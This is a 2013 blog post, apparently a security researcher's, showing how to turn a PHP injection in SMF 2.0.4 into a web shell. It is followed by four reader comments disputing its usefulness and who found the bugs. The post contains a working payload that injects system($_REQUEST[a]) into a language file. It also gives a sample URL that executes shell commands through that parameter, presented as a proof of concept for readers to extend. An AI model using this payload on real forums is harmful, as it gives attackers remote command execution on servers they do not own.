Thursday 1 August 2013

[EN] SMF 2.0.4 PHP Injection - part 2

Durning last few weeks a lot of you asked me about how to add shell via this PHP injection
vulnerability.

I decide to publish another poc-code to show you how it can be done (but I believe
that few of you can code better php-ideas than me ;) )

Anyway, as it was described here and here, try to add - as this 'poc-php-code' - line
like this one:

---< code >---
 en_US\';system($_REQUEST[a]);//
---< code >---

Next step to do is go directly to your (changed) file and add an 'a' parameter with
value equal to Bash command :)

Try it:
http://192.168.255.105/smf2.0.4/Themes/default/languages/index.english.php?a=echo%20%27%3Cpre%3E%27;ls%20-la%20;%20echo%20%27%3C/pre%3E%27

Now it will be possible to create a working web-shell.

Let me know via email or comments again if you have other ideas how this attack can be extended. ;)

Cheers!

o/

4 comments:

  1. you do realize that you need admin access to achieve this, also its rather useless in the case that the languages directory is not writable which will be a majority of cases

    ReplyDelete
  2. and you do realize that this is poc?

    ReplyDelete
  3. it doesnt matter if its a poc, ive known about this since smf 2.0.1 was released, most of the bugs you have mentioned here were found by others, just like most of the submissions you have made to packetstorm are finds by other researchers that you have just attempted to credit yourself for

    ReplyDelete
  4. ad 'it doesnt matter if its a poc, (...) bugs you have mentioned here were found by others, just like most of the submissions you have made to packetstorm are finds by other researchers that you have just attempted to credit yourself for'


    yeah yeah. show me those findings. ;)

    ReplyDelete

What do You think...?